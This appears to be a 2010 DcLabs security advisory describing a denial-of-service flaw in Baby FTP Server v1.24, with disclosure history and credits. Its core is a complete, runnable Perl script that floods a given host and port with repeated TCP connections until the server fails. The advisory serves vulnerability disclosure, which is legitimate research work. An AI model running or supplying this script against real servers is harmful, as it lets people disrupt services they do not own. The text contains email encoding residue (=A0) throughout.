[DCA-0004]

[Software]

=A0- Baby FTP Server

[Vendor Product Description]

=A0- Baby FTP server has only the most necessary features and is yet
powerful enough to be a basis for a more complex server

[Bug Description]

=A0- The FTP Server can't handle multiple/simultaneous connections
leading to Denial-of-Service

[History]

=A0- Advisory sent to vendor on 06/14/2010.
=A0- No response from vendor
=A0- Public advisory & exploit 08/02/2010.

[Impact]

=A0- Low

[Affected Version]

=A0- Baby FTP Server v1.24
=A0- Prior versions may also be vulnerable

[Code]

#!/usr/bin/perl
use IO::Socket;

=A0=A0=A0=A0=A0=A0=A0 if (@ARGV < 1) {
=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0 usage();
=A0=A0=A0=A0=A0=A0=A0 }

=A0=A0=A0=A0=A0=A0=A0 $ip=A0=A0=A0=A0 = $ARGV[0];
=A0=A0=A0=A0=A0=A0=A0 $port=A0=A0 = $ARGV[1];
=A0=A0=A0=A0=A0=A0=A0 $conn=A0=A0 = $ARGV[2];

=A0=A0=A0=A0=A0=A0=A0 $num=A0=A0=A0 = 0;

=A0=A0=A0=A0=A0=A0=A0 print "[+] Sending request...\n";

=A0=A0=A0=A0=A0=A0=A0 while ( $num <= $conn ) {
=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0 system("echo -n .");
=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0=A0 $s = IO::Socket::INET->new(Proto => "tcp", PeerAddr =>
"$ip", PeerPort => "$port") || die "[-] Connection FAILED!\n";

=A0=A0=A0=A0=A0=A0=A0 close($s);
=A0=A0=A0=A0=A0=A0=A0 $num++;
=A0=A0=A0=A0=A0=A0=A0 }

=A0=A0=A0=A0=A0=A0=A0 print "\n[+] Done!\n";

sub usage() {
=A0=A0=A0=A0=A0=A0=A0 print "[-] Usage: <". $0 .">   \n";
=A0=A0=A0=A0=A0=A0=A0 print "[-] Example: ". $0 ." 127.0.0.1 21 1200\n";
=A0=A0=A0=A0=A0=A0=A0 exit;
}


[Credits]

Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br 


[Greetz]
Crash and all Dclabs members.

-- 
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br